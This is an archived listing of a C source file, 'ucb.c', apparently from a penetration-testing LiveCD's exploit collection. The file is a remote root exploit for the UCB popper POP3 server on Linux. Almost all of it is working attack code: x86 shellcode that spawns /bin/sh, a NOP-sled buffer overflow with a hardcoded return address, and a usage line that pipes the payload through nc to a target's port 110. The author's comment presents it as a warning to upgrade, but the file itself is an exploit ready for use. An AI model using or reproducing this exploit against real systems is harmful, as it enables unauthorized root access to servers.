home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / pop3 / ucb.c

< prev

Wrap

C/C++ Source or Header  |  2005-02-12  |  1KB  |  61 lines

---

1. /*
2.  * Remote root exploit for UCB popper on Linux 
3.  *
4.  * sk8@lucid-solutions.com
5.  * http://www.lucid-solutions.com
6.  * 
7.  * Usage: ( ./linux-ucb 0 ; cat ) | nc your.host.com 110
8.  * Try adjusting offsets by 100.
9.  *
10.  * Tested on UCB Pop server (version 1.831beta) 
11.  * 
12.  * I figure it's safe to release this since UCB is not that 
13.  * common anymore.  But if you are still running it on your 
14.  * system(s), you had better upgrade.  This program shows you 
15.  * why.
16.  * 
17.  */
18.  
19. #include        <stdio.h>
20. #include        <stdlib.h>
21. #include        <unistd.h>
22. #include        <sys/errno.h>
23.  
24. /* Linux x86 shellcode */
25. char *shell=
26.   "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
27.   "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
28.   "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
29.   "\xff\xff/bin/sh";
30.  
31.  
32. #define ADDR 0xbffff1d8
33. #define OFFSET 0
34. #define BUFLEN 1100
35.  
36. char    buffer[BUFLEN];
37. int     offset=OFFSET;
38.  
39.  
40. int main (int argc, char *argv[])
41. {
42.   int i;
43.  
44.   if(argc > 2)
45.     {
46.       printf("Usage: %s [offset]\n",argv[0]);
47.       exit(0);
48.     }
49.   if(argc==2)
50.     offset=atoi(argv[1]);
51.  
52.   /* Set up the buffer */
53.   memset(buffer,0x90,BUFLEN);
54.   memcpy(buffer+BUFLEN-200-strlen(shell),shell,strlen(shell));
55.   for(i=BUFLEN-200+1;i<BUFLEN-4;i+=4)
56.     *(int *)&buffer[i]=ADDR-BUFLEN+100+offset;
57.   buffer[BUFLEN-1]='\n';
58.  
59.   printf("%s\n", buffer);
60. }
61. /*                    www.hack.co.za              [2000]*/